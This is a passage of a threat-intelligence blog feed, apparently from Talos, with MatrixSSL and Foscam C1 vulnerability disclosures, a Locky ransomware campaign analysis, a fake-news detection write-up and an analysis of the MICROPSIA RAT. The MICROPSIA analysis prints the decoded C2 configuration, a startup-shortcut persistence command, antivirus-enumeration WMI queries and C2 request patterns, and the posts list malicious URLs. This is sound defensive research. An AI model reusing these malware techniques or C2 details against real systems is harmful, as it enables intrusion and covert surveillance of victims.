TALOS-2017-0276: InsideSecure MatrixSSL x509 certificate SubjectDomainPolicy Remote Code Execution Vulnerability (CVE-2017-2780)

MatrixSSL is susceptible to a heap based buffer overflow due to a vulnerability in the 'parsePolicyMappings' function while parsing the x509 SubjectDomainPolicy PolicyMappings extension. When parsing x509 certificates in DER format, a fixed size heap allocation occurs. In situations where the received encoded OID value is longer than the amount of space that has been allocated to the heap, an overflow condition occurs. This vulnerability could be exploited by an attacker to achieve remote code execution on vulnerable systems using a specially crafted OID value.

TALOS-2017-0277: InsideSecure MatrixSSL x509 certificate IssuerDomainPolicy Remote Code Execution Vulnerability (CVE-2017-2781)

MatrixSSL is susceptible to a heap based buffer overflow due to a vulnerability in the 'parsePolicyMappings' function while parsing the IssuerPolicy PolicyMappings extension. When parsing x509 certificates in DER format, a fixed size heap allocation occurs. In situations where the received encoded OID value is longer than the amount of space that has been allocated to the heap, an overflow condition occurs. This vulnerability could be exploited by an attacker to achieve remote code execution using a specially crafted OID value.

TALOS-2017-0278: InsideSecure MatrixSSL x509 certificate General Names Information Disclosure Vulnerability (CVE-2017-2782)

MatrixSSL is susceptible to an integer overflow due to a vulnerability in how general names extensions are parsed by the 'parseGeneralNames' function. An specially crafted x509 certificate containing attacker controlled subject alternative names ASN1 strings can be used to create an integer overflow that can be used to leak sensitive information on affected systems.

Conclusion

Talos has worked to responsibly disclose these vulnerabilities to InsideSecure. InsideSecure has released a security update 3.9.3 to resolve these issues. Many of the embedded systems potentially affected by these vulnerabilities lack modern heap exploitation mitigations which may make it easier to successfully exploit them. As some of these vulnerabilities can be leveraged by an attacker to obtain remote code execution on affected systems, it is recommended that the security update be applied as quickly as possible. Ensuring that systems remained patched against the latest software vulnerabilities is essential to ensuring that environments remain protected. The latest version of this software package is available here.

For full details regarding these vulnerabilities, please see the advisories here, here and here.

Research efforts to identify zero-day vulnerabilities in software will remain an ongoing effort by Talos. Our work in developing programmatic methods to identify zero-day vulnerabilities and making sure they are addressed in a responsible manner is critical to improving the overall security of the internet.

Our vulnerability reporting and disclosure policy can be found here.

Coverage

The following Snort IDs have been released to detect these vulnerabilities: 41466, 41467

Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

For further zero day or vulnerability reports and information visit:

http://talosintelligence.com/vulnerability-reports/

Player 1 Limps Back Into the Ring - Hello again, Locky!

noreply@blogger.com (Alexander Chiu) — Wed, 21 Jun 2017 14:00:00 PDT

This post was authored by Alex Chiu, Warren Mercer, and Jaeson Schultz. Sean Baird and Matthew Molyett contributed to this post.

Back in May, the Necurs spam botnet jettisoned Locky ransomware in favor of the new Jaff ransomware variant. However, earlier this month Kaspersky discovered a vulnerability within Jaff which allowed them to create a decryptor. This turn of events seems to have caused the miscreants behind Necurs to scramble to distribute a different ransomware payload. Falling back on their old tricks, they have selected to re-distribute Locky ransomware. The malware is being transmitted via email using an .exe file encapsulated within two compressed .zip archives.

The Spam Campaign

The spam that is distributing this ransomware campaign is not significantly different from other ransomware spam campaigns that we have seen from Necurs. Ransomware-oriented spam campaigns from Necurs typically involve order confirmations, payment receipts, business documents, and so on -- all with the common goal of social engineering victims into opening the attachment. The messages Talos observed in this particular campaign are disguised as fake invoices.

An example spam message propagating Locky ransomware

The volume of Locky spam Necurs has sent since the start of this particular campaign is notable. In the first hour of this campaign, Talos observed that Locky spam accounted for up to 7.2% of email volume on one of our systems. While the campaign has since decreased in the number of messages being sent per minute, Necurs is still actively sending messages containing Locky, though only in small quantities.

Chart illustrating the volume of Locky spam as a percent of total email volume one of our systems observed.

Locky's Metamorphosis

Although they are using the same affiliate ID, for this particular round of Locky, the attackers have altered their ransomware. We were unable to get the ransomware to encrypt data on any systems running an operating system more recent than Windows XP. Upon further investigation, we determined that on systems running Windows 7 or later with Data Execution Prevention (DEP) would cause the unpacker to fail. Our analysis suggests that Locky has now added anti-debugging protection to their configuration. Instead of unpacking the configuration, when a debugger is detected their config pointer is directed at kernel32!AllocConsole, frustrating any attempts at analysis. In response to this new anti-analysis technique, Talos has updated LockyDump so that it is able to extract the configuration information from this latest iteration.

Locky's unpacker crashes when trying to execute stack memory on systems more recent than Windows XP.

Another notable aspect of this latest campaign was the C2 URL structure. Adversaries behind this latest Locky campaign have reused the /checkupdate path as part of the URL structure -- the same URL structure found in previous Locky campaigns. This is perhaps another indication that adversaries were hasty in their developing and distributing this campaign.

Threat Grid sandbox run illustrating Locky C2 communication

Conclusion

This updated version of Locky appears to have been hastily deployed, and as a result it has not affected users running Windows operating systems other than Windows XP. The attackers behind this ransomware are likely already aware of this, so we can expect a fixed version of Locky to appear in a future round of Necurs' ransomware spam.

Despite sounding like a broken record, we at Talos feel it's our duty to re-iterate that it's always risky clicking on links or opening attachments in strange email messages. Users that fail to heed this advice can easily become ransomware victims, and if the subsequent ransom is paid, the monies will no doubt fund another round of attacks. As always, organizations are encouraged to make regular backups of their data, practice restoring said data, and store your backups offline far out of the reach of potential criminals.

Coverage

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS, WSA, and Umbrella can help identify hosts that have been compromised by Locky by detecting outbound C2 traffic.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.

IOCs

SHA256

49184047c840287909cf0e6a5e00273c6d60da1750655ad66e219426b3cf9cd8
3285c3f37aa192a173f62fee82f7a966a6df6e5db4642d63a6784f39a63012b6

File Extension for Files Encrypted by Locky

.loptr

Hard-coded Locky C2 URL

hxxp://185.115.140[.]170/checkupdate

Locky DGA C2s (20th/21st June - DGA seed 65123)

hxxp://emtsgdqsik[.]pl/checkupdate
hxxp://tqathwvfaqfisj[.]pl/checkupdate
hxxp://dqutujymgc[.]info/checkupdate
hxxp://ddgtdcgoysuq[.]ru/checkupdate
hxxp://lrsjplrlaceugxw[.]work/checkupdate
hxxp://cstfxgujaf[.]biz/checkupdate
hxxp://gcbdwbtshl[.]xyz/checkupdate
hxxp://wxcjqfevrkosp[.]biz/checkupdate
hxxp://hllfhiqwneuwwx[.]biz/checkupdate
hxxp://agnfmqvhomsa[.]work/checkupdate
hxxp://ythjvjhtgsfgesd[.]biz/checkupdate
hxxp://kabssqyef[.]info/checkupdate

Talos Targets Disinformation with Fake News Challenge Victory

noreply@blogger.com (William Largent) — Tue, 20 Jun 2017 10:22:00 PDT

This post was authored by Sean Baird with contributions by Doug Sibley and Yuxi Pan

Executive Summary

For the past several months, the problem of “fake news” has been abuzz in news headlines, tweets, and social media posts across the web. With historical roots in information warfare and disinformation, “fake news” is a different kind of cyber-threat affecting people all around the globe. Using advanced machine learning and artificial intelligence technology, Talos researchers set their sights on this different kind of cyber-threat and beat out over 80 registered teams worldwide to claim first place in the Fake News Challenge.

Context

Background

While there has been significant media coverage regarding fake news in the recent months, the modern fake news problem is rooted in a long history of information operations and disinformation campaigns.

In a very in-depth paper about the topic, Facebook defines information operations “[...] as actions taken by organized actors...to distort domestic or foreign political sentiment, most frequently to achieve a strategic and/or geopolitical outcome [...]” and classifies “false news” as a useful tool in the information operations toolkit. The paper specifies that “false news” is “[...] news articles that purport to be factual, but which contain intentional misstatements of fact with the intention to arouse passions, attract viewership, or deceive.”

Alternately, the Wired article announcing the victory describes fake news in a simpler manner as “[...] made-up news stories created to convert social media shares into page views, ad dollars, and perhaps even political traction.”

Clearly, this is a difficult problem to solve in cyberspace, especially in a world where technology and social media can help amplify these stories to a much broader audience. This prompted several researchers in academia and industry to create the Fake News Challenge (FNC). The self described goal of the FNC is to “[...] address the problem of fake news by organizing a competition to foster development of tools to help human fact checkers identify hoaxes and deliberate misinformation in news stories.”

The first iteration of the challenge (FNC-1), which lasted from December 1, 2016 until June 2, 2017 focused solely on stance detection, a crucial first step in helping to detect fake news.

FNC-1: Stance Detection

While actual truth-labeling is a hefty task, rife with political and technical issues, stance detection is a potential first step toward a more robust solution. Dean Pomerleau, one of the organizers of the challenge, explained in a Mediashift interview that “[...] the goal [of stance detection] is to determine which has the best argument, not just which is the most popular or widely cited or read, the way a search engine does.”

In the context of the FNC, stance detection can be defined as labeling the relationship an article body has to its headline/claim -- specifically, whether the body agrees with, disagrees with, or discusses the headline/claim or whether the body is completely unrelated. Thus, the four possible outputs of a stance detection system should be “agree,” “disagree,” “discuss,” and “unrelated.” An example of how stance detection could be implemented in a broader fake news detection system is available in the figure below:

Stance detection’s role in fake news detection

Always interested in a challenge, the FNC piqued the interest of Talos researchers who chose the team name “SOLAT IN THE SWEN” as a clever anagram of their true affiliation. Immediately, these researchers began development work on various models and solutions in their spare time -- models which would eventually net them a first place victory.

SOLAT IN THE SWEN - Talos’s covert team name

Our Solution

One of the goals of this challenge was “[...] to explore how artificial intelligence technologies, particularly machine learning and natural language processing, might be leveraged to combat the fake news problem [...].” Because of this, team SOLAT IN THE SWEN decided to test how various cutting-edge machine learning techniques performed. After successfully implementing several different models, the team found that their results were best when combining multiple models in an ensemble. The team’s final submission was an ensemble based on an 50/50 weighted average between gradient-boosted decision trees and a deep convolutional neural network. The full code can be found on the Talos GitHub, open sourced with an Apache 2.0 license.

Our models were ensembled with a 50/50 weighted average

Deep Learning Approach

The first model used by the team applies several different neural networks used in deep learning. This model applies a one-dimensional convolutional neural net (CNN) on the headline and body text, represented at the word level using the Google News pretrained vectors. CNNs allow for efficient, effective parallel computation while performing The output of this CNN is then sent to an multi-layer perceptron (MLP) with 4-class output -- “agree,” “disagree,” “discuss,” and “unrelated” -- and trained end-to-end. The model was regularized using dropout (p=.5) in all convolutional layers. All hyperparameters of this model were set to sensible defaults, however, they were not further evaluated to find better choices.

Diagram outlining our deep learning model

The architecture of this model was selected due to its ease of implementation and fast computation since we can rely on convolutions instead of recurrence. Judging from the relative strength of this model convolutions seem to be able to capture a wide variety of topics; however, the model is limited in that it only gets to observe the text once. A potential extension to this model would be to include some sort of attention mechanism with recurrence after the convolutions which would allow the model query specific aspects of the headline/body after receiving a general summary from the CNN.

Gradient-Boosted Decision Trees (GBDT) Approach

The other model employed in the ensemble is a Gradient-Boosted Decision Trees (GBDT) model. This model inputs few text-based features derived from the headline and body of an article, which are then fed into Gradient Boosted Trees to predict the relation between the headline and the body.

Diagram outlining our decision tree model

After exploring the dataset, a few features that are likely to be informative of headline/body relationships became obvious -- for example:

The number overlapping words between the headline and body text;
Similarities measured between the word count, 2-grams and 3-grams; and
Similarities measured after transforming these counts with term frequency-inverse document frequency (TF-IDF) weighting and Singular Value Decomposition (SVD).

Using these features, it is not necessary to use a powerful and expressive model to learn the complex mapping from these features to the stance label.

For this, Gradient-Boosted Decision Trees were chosen because of the model’s robustness with regard to the different scales of our feature vectors. Specifically, no normalization is needed and it can be regularized in several different ways to avoid overfitting. Furthermore, XGBoost is a very efficient, open-source implementation that was easily applied to the handcrafted features.

Real World Exercise

Some readers may be wondering what the output of our system looks like with real-world data. As a fun exercise, we ran the contents of a first draft of this blog post through our system with various headlines -- the real headline of the post, and a few others we made up for the sake of this activity. These headlines are:

Talos Targets Disinformation with Fake News Challenge Victory (the real headline);
Team Loses Fake News Challenge;
Research Shows Fake News is Unsolvable; and
Giraffe Livestream Continues to Fourth Week with No Action.

We were excited to see whether or not our models would be able to correctly detect the stance of our blog post with each of these headlines. The results can be found in the figure below:

Results of this blog post and various test headlines being evaluated by our system

As shown above, while neither the deep learning approach nor the GBDT approach had perfect accuracy, the combination of these two approaches with a 50/50 weighting detected the correct stance for each headline.

Conclusion

In the end, these innovative model implementations put Talos on top of the global leaderboard. While more research needs to be done, Talos’s award-winning research on stance detection is an important first step toward tackling the problem of fake news and disinformation in the 21st century.

As the Fake News Challenge moves forward and the natural language processing community continues to churn out cutting-edge research, Talos remains committed to continually forcing the bad guys to innovate.

Delphi Used To Score Against Palestine

noreply@blogger.com (Warren Mercer) — Mon, 19 Jun 2017 08:48:00 PDT

This blog was authored by Paul Rascagneres and Warren Mercer with contributions from Emmanuel Tacheau, Vanja Svajcer and Martin Lee.

Executive Summary

Talos continuously monitors malicious emails campaigns. We identified one specific spear phishing campaign launched against targets within Palestine, and specifically against Palestinian law enforcement agencies. This campaign started in April 2017, using a spear phishing campaign to deliver the MICROPSIA payload in order to remotely control infected systems. Although this technique is not new, it remains an effective technique for attackers.

The malware itself was developed in Delphi; in this article, we describe the features and the network communication to the command and control server used by the attackers. The threat actor has chosen to reference TV show characters and include German language words within the attack. Most significantly, the attacker has appeared to have used genuine documents stolen from Palestinian sources as well as a controversial music video as part of the attack.

Spear Phishing Campaign

We identified a spear phishing campaign that appeared to be targeting members of the Palestinian law enforcement services as well as other Palestinian targets in the public sector. The email purports to be sent from an individual named "Yasser Saad" but includes a mismatch between the apparent name and the email address 'yassersaaid01@gmail.com' suggesting "Yasser Saaid".

The subject of the email translates to "Brothers security officers and directors", with the text content "Kindly to view and circulate under the responsibility:
The Council of Ministers' Decision on the Use of the Internet in Government Institutions"

Attached to the email is a .r10 file, which suggests that the file is a tenth part of a split RAR archive. However, this isn't the case. The attachment is a simple RAR file. Despite the unusual file name extension, this file can be opened by many RAR archive handlers without modification.

The RAR archive contains a single executable file named: InternetPolicy_65573247239876023_3247648974234_32487234235667_pdf.exe

The .r10 file extension may have been chosen in order to confuse automated file parsing systems that check for malicious contents of archives with known file name extensions. Similarly, the long name of the file within the archive, along with the ending '_pdf.exe' may have been used to convince victims into thinking that the file is a real PDF file. It is worth keeping in mind that by default Windows will not show the .exe extension to the user. The icon of executable file itself is that commonly used for PDF files, enhancing the idea that the contents of the archive is a PDF.

When the executable is launched it extracts the decoy document embedded as the PE resource named Resource_1 and opens it.

Decoy Document

The decoy document displayed, InternetPolicy.pdf, is a scanned document by the Ministry Of Interior of the State Of Palestine, signed by Dr Alaa Mousa, Minister of Communications & Technologies:

The decoy document contains 7 pages describing new internet usage policies. The first page (shown above) informs governmental departments of the policy, and instructs them to follow it. A handwritten note stated to be from the Director of the IT Department adds his 'seal of approval' to the document.

In the background, the malware MICROPSIA is executed on the infected system. This malware is a Remote Administration Tool (RAT), it will be described later.

Associated Campaigns

We have also identified drive-by download campaigns which are distributing variants of the same malware, but with different decoy documents.

URLs used in this campaign include:

http://sheldon-cooper[.]info/Fuqha_NewDetails_docx.r10
http://feteh-asefa[.]com/pc/public/Fuqha_NewDetails_docx.r10
http://feteh-asefa[.]com/pc/public/Altarnatevs.r10
https://sheldon-cooper[.]info/attachment.r10

As with the spear phish, the archives also have the same .r10 extension. The first two archives contain the file: Fuqha_NewDetails_874918321795_39778423423094_1988734200039_docx.exe which although the file name suggests a .docx file, the icon is that of a PDF document.

The second two archives contain the file: Altarnatives_Palestine_89840923498679852_9879483278432732489_pdf.exe Again being an executable file with a PDF style icon.

Decoy Documents

Altarnatives_Palestine Document

The .pdf decoy document is study from the Palestinian Center for Policy Research and Strategic Studies (MASARAT):

This 22 pages long research document addresses the current level of threat & security issues within the West Bank for 2016 & 2017. It contains chapters relating to human rights, data from Arab World for Research and Development center, violence center report etc.

Fuqha_NewDetails Document

This 8 page long document appears to be an intelligence report based on interviews, documents and public information. The document mentions an assassination report of one of the highest ranked officers of the Al Qassam group's (Millitary Wing of HAMAS, aka Armed Militia). The document contains a single image, an illustration of the leadership of Hamas, hierarchical security & subgroups:

Further Campaigns

We also identified additional, related malicious documents which conform to the same naming pattern and which share indicators with the original malware we discovered.

Plan_Palestine Document

Plan_Palestine_898409266595123498679852_9879483278432732489_pdf.exe

The decoy document of this sample is a word document. It presents the strategic objectives, policies and interventions concerning security units (aka Police), including how to face the challenges, how to train police, new weapons etc.

Diwan2017_Palestine Document

Diwan2017_Palestine_89840923498679852_9879483278432732489_pdf.exe

This decoy document is a PDF file. The document itself appears to be scanned from the Council of Ministers of Palestine and relates to an announcement concerning employee regulation.

Goal2017 Document

Goal2017_487886_10152599711675287_250999354_n_354343741352mp4.exe

Instead of a decoy document, this sample is a decoy video of a music clip "Goal" by the Lebanese singers Myriam Klink and Jad Khalife. This video is particularly controversial as the overt nature of the video led it to be banned by the Lebanese Justice ministry. The sharing or airing of it is subject to a fine of 50 000 000 Lebanese Liras (approximately 33k USD).

MICROPSIA Analysis

For all of these decoy documents, the malware is identical, the only differences are the sections containing the decoy documents themselves. The malware is a remote access trojan (RAT) written in Delphi named MICROPSIA.

Features

Firstly, the malware copies itself in C:\ProgramData\MediaPlayer\ExecuteLibrary.exe. The malware contains several resources, one of which is the decoy document, another is a legitimate binary developed by OptimumX named shortcut.exe. As expected the purpose of this tool is to create a shortcut. It is through creating a shortcut that the malware ensures its persistence:

Shortcut.exe /f:"C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\D_Windows_v1.lnk" /a:c /t:"C:\ProgramData\MediaPlayer\ExecuteLibrary.exe"

The malware is a Remote Administration Tool (RAT) which downloads and executes an executable obtained from the Command & Control infrastructure. This executable is downloaded in string format and then modified to become a binary file with the Hex2Bin Delphi API.

An interesting element is the obfuscation algorithm used to hide the configuration of the RAT. The variables are stored in a custom base64:

Once decoded with base64 and with 2 XOR Keys we can obtain the configuration of the malware:

[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
[InternetShortcut]
IDList=
URL=file://
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
http://camilleoconnell.website/api/white_walkers/
daenerys
betriebssystem
anwendung
mikasa
ackerman
ginny
AV

We will see later, that this configuration contains the User-Agent, the CC URL and the json keys used for the network communication.

Additionally the malware is interested by Anti-Virus installed on the system. It uses WMI queries to get this information:

SELECT * FROM AntiVirusProduct
SELECT * FROM AntiSpywareProduct
SELECT * FROM FirewallProduct

If an security product is installed this information is sent to the attacker.

Network Communication

All the network parameters are stored in the sample and can be easily updated by the author. The CnC is a web server: http://camilleoconnell[.]website

The network communication is performed in HTTP. The malware uses an hardcoded User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

To register a new infected system the malware perform a POST request to /api/white_walkers/new with data on the compromised system consisting of:

the filename of the executed malware and the version;
the version of the infected Operating System;
the hostname and username encoded in base64.

The CC will reply in json format. The json object contains an ID (incremented each time that an infected system is registered) and 3 other boolean values: load_varys, lma and ausfart. Here is an output of a registration:

As part of our investigation we believe currently more than 500 systems are already registered on the CC. This number may be a mix of genuinely infected systems and security researcher sandbox systems.

After a registration, the malware periodically performs HTTP requests to the CC with the following pattern: GET /api/white_walkers/[base64_data_previously_sent]/requests

The server will reply with a json object. We assume that the server can issue orders to the infected system. Here is an example:

Reference to TV Show Characters

In the analysed variant, we identify several reference to TV Show characters in the network communication and the URLs used by this actor:

sheldon-cooper[.]info: this URL is a reference to one of the main characters of "The Big Bang Theory" named Sheldon Cooper;
Camilleoconnell[.]website: this URL is a reference to Camille O'Connell, the main actress of "The Vampire Diaries" and "The Originals";
Mikasa Ackerman is a json key returned by the CC. And this name is a character in "Attack on Titan";
/White_Walker/ in the URL is a species in the TV Show "Game of Thrones";
Deanerys is a variable used during Web request. This is the name of a character in "Game of Thrones";
Lord_varys is another json key returned by the CC. This is the name of a "Game of Thrones" character.

The malware author appears to have a real interest for TV shows.

Goethe's Style

We identified the use of german language words in the network communication with the Command and Control server.

"Betriebssystem" which means Operating System. This variable is used to send the OS version (for example "Windows 7 Service Pack 1 (Version 6.1, Build 7601, 32-bit Edition)")
"Anwendung" which means Application. This variable is used to send the filename and the version of the malware.
"Ausfahrt" which means Exit. This is a json key used by the CC during network communication. The key contains a boolean (false/true)

Obviously, the use of german words does not necessarily means that the author is German. The author could simply be adding german word in order to cover their tracks.

Conclusion

This spear phishing campaign was directed against Palestinian authorities and possibly against other entities. At least 500 machines have been registered by the CC infrastructure, which is still operating, indicating that this is a successful campaign.

At Talos, we have in-depth experience of many APT campaigns, in this case one of the most surprising elements is the overt naming convention: the author deliberately uses references to several US TV show and intentionally uses German words for malware communication. We have no indication if these inclusions are to confuse attribution, to mock analysts, or a lapse of trade craft. This is in contrast to the highly convincing decoy documents which appear to be copies of genuine documents relating to the current situation in Palestine which suggests a high degree of professionalism.

IOCs

File hashes

InternetPolicy.r10: 9b162f43bcbfaef4e7e7bdffcf82b7512fac0fe81b7f2c172e1972e5fe4c9327

InternetPolicy_65573247239876023_3247648974234_32487234235667_pdf.exe: 9cb5ef0b17eea1a43d5d323277e08645574c53ab1f65b0031a6fc323f52b0079

Attachment.r10: c7081b00ad8db62519c7af2cb5f493f56ecc487b087ae52d01f43953d2aa6952

Altarnatives_Palestine_89840923498679852_9879483278432732489_pdf.exe: 0180e2b601ae643e7adf1784c313dd2d10d114bd2b5692eb6e9c031a6e448ed1

Fuqha_NewDetails_docx.r10: 94902877b2cb523548a272d4e4fe0789192e1cb35b531297368b16a2865b33af

Fuqha_NewDetails_874918321795_39778423423094_1988734200039_docx.exe: 77adba034d13b570c6aab79282326a1eb2efdfc14fbd7cd0651906e3fa31f9fe

Plan_Palestine_898409266595123498679852_9879483278432732489_pdf.exe: 6c5884cf45d943f51566ea98113fecf851d49f59b70c8039aa21a14e09e21e5c

Diwan2017_Palestine_89840923498679852_9879483278432732489_pdf.exe: 7c87f992674b962269d7fb2ffbad6d21f606c90d151a6fb67ac54387b6883aae

Goal2017_487886_10152599711675287_250999354_n_354343741352mp4.exe:

5f5af4762c073234fef6bfeaa3b9f6a04982e82a25e540116aa1f9e38223ae2b

Domains

feteh-asefa[.]com

sheldon-cooper[.]info

camilleoconnell[.]website

URLs

http://sheldon-cooper[.]info/Fuqha_NewDetails_docx.r10

http://feteh-asefa[.]com/pc/public/Fuqha_NewDetails_docx.r10

http://feteh-asefa[.]com/pc/public/Altarnatevs.r10

https://sheldon-cooper[.]info/attachment.r10

http://camilleoconnell[.]website/api/white_walkers/new

http://camilleoconnell[.]website/api/white_walkers/[base64]/requests

Coverage

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella prevents DNS resolution of the domains associated with malicious activity.

Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.

Vulnerability Spotlight: Multiple Foscam C1 Vulnerabilities Come in to Focus

noreply@blogger.com (Nick Biasini) — Mon, 19 Jun 2017 08:45:00 PDT

Executive Summary

The Foscam C1 is a webcam that is marketed for use in a variety of applications including home security monitoring. As an indoor webcam, it is designed to be set up inside of a building and features the ability to be accessed remotely via a web interface or from within a mobile application. Talos recently identified several vulnerabilities in the Foscam C1 camera that could be used by attackers for a variety of purposes including access and retrieval of sensitive information stored on the camera, execution of arbitrary commands within the camera's operating system, and in several cases, completely compromise the device. As these cameras are commonly deployed in sensitive locations and used as baby monitors, security cameras, etc. it is recommended that affected devices be updated as quickly as possible to ensure that they are no longer vulnerable.

In accordance with our responsible disclosure policy, Talos has worked with Foscam to resolve these issues, which has resulted in the release of a firmware update addressing them.

Vulnerability Details

Foscam C1 Webcam FTP Hard Coded Password Vulnerability (TALOS-2016-0245 / CVE-2016-8731)

Vulnerability Discovered by Richard Harman and Dave McDaniel of Talos

Talos recently discovered that Foscam C1 Indoor HD Cameras contain undocumented, hardcoded FTP credentials that could allow an attacker the ability to remotely login to affected devices and gain full read and write access to the Micro-SD card mounted within the device. This access could be used to obtain sensitive information such as audio and video recordings, images, and other data stored on the Micro-SD card. This vulnerability, TALOS-2016-0245 has been assigned CVE-2016-8731. For additional information, please see the advisory here.

Foscam IP Video Camera WebService CGI Parameter Code Execution Vulnerability (TALOS-2017-0299 / CVE-2017-2805)

Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a stack based buffer overflow in the "CGIProxy.fcgi" service of the web management interface. An attacker could use a specially crafted HTTP request to trigger this overflow condition. This vulnerability could be leveraged by an attacker to achieve code execution on vulnerable devices. This vulnerability, TALOS-2017-0299 has been assigned CVE-2017-2805. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi Account Creation Command Injection Vulnerability (TALOS-2017-0328 / CVE-2017-2827)

Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service of the web management interface. An attacker could insert arbitrary characters into the "addAccount" command via either the "usrName" or "usrPwd" parameters, resulting in execution of arbitrary OS commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. This vulnerability, TALOS-2017-0328 has been assigned CVE-2017-2827. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi Account Password Command Injection Vulnerability (TALOS-2017-0329 / CVE-2017-2828)

Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service of the web management interface. An attacker could insert arbitrary characters into the "changePassword" command during the account password change process, resulting in execution of arbitrary OS commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. TALOS-2017-0329 has been assigned CVE-2017-2828. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi Message 0x3001 Directory Traversal Vulnerability (TALOS-2017-0330 / CVE-2017-2829)

Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a directory traversal vulnerability present in the "CGIProxy.fcgi" service of the web management interface. This vulnerability could allow an attacker to retrieve arbitrary files from the camera using an HTTP request. This could result in the disclosure of sensitive information. This vulnerability is due to a failure to adequately sanitize user input and could allow an attacker to traverse outside of the intended directory structure of the web interface. TALOS-2017-0330 has been assigned CVE-2017-2829. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi Message 0x3001 Multi-part Form Boundary Code Execution Vulnerability (TALOS-2017-0331 / CVE-2017-2830)

Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a buffer overflow vulnerability present in the "CGIProxy.fcgi" service of the web management interface. Exploitation of this vulnerability could result in the execution of arbitrary code on affected devices. An attacker could trigger this vulnerability using a specially crafted HTTP request to overwrite the buffer on the stack and ultimately obtain control over code execution flow within the device. This vulnerability is due to a failure of the device to perform proper bounds checking on input received from users. TALOS-2017-0331 has been assigned CVE-2017-2830. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi Query Append Code Execution Vulnerability (TALOS-2017-0332 / CVE-2017-2831)

Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a buffer overflow vulnerability present in the "FCGX_Init" function within the "CGIProxy.fcgi" service of the web management interface. An attacker could leverage this vulnerability to obtain remote code execution on affected devices. This vulnerability could be triggered using a specially crafted HTTP request and allow an attacker to overwrite the buffer or obtain control over code execution flow within affected devices. TALOS-2017-0332 has been assigned CVE-2017-2831. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability (TALOS-2017-0334 / CVE-2017-2833)

Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present within the "webService" application that is launched by the device during the bootup process. An attacker could leverage this vulnerability to execute operating system commands on the device during device startup. This vulnerability can be exploited using any command that allows for changing an account password (e.g. changePassword). During startup the FTP service is configured using shell commands without sanitizing the password parameter, resulting in execution of the attacker supplied commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. The injected command would then be executed once the device reboots. TALOS-2017-0334 has been assigned CVE-2017-2833. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi Account Deletion Command Injection Vulnerability (TALOS-2017-0335 / CVE-2017-2832)

Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands during the Account Deletion process within the web interface. An attacker could exploit this vulnerability using a specially crafted HTTP request. The vulnerability is triggered when the "delAccount" command is invoked. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. TALOS-2017-0335 has been assigned CVE-2017-2832. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi SMTP Test Host Parameter Configuration Command Injection Vulnerability (TALOS-2017-0343 / CVE-2017-2841)

Vulnerability Discovered by Claudio Bozzato of Cisco Talos.

Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "msmtprc" configuration file on the device, resulting in execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the "smtpTest" command and injecting commands into the "SMTP Test Host" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0343 has been assigned CVE-2017-2841. For additional information, please see the advisory here.

Foscam IP Video Camera CGIProxy.fcgi SMTP Test User Parameter Configuration Command Injection Vulnerability (TALOS-2017-0344 / CVE-2017-2842)

Vulnerability Discovered by Claudio Bozzato of Cisco Talos.

